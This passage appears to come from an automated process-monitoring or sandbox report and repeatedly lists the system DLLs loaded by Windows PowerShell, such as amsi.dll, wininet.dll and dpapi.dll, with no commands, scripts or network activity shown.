Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: atl.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mscoree.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: kernel.appcore.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: version.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: vcruntime140_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: ucrtbase_clr0400.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptsp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: rsaenh.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: cryptbase.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: windows.storage.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wldp.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msasn1.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: amsi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: userenv.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: profapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: gpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: msisip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wshext.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: appxsip.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: opcservices.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: secur32.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: sspicli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: uxtheme.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: urlmon.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: iertutil.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: srvcli.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: netutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: propsys.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wininet.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: microsoft.management.infrastructure.native.unmanaged.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: mi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: miutils.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wmidcom.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: dpapi.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
Section loaded: wbemcomn.dll |
|
Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe |
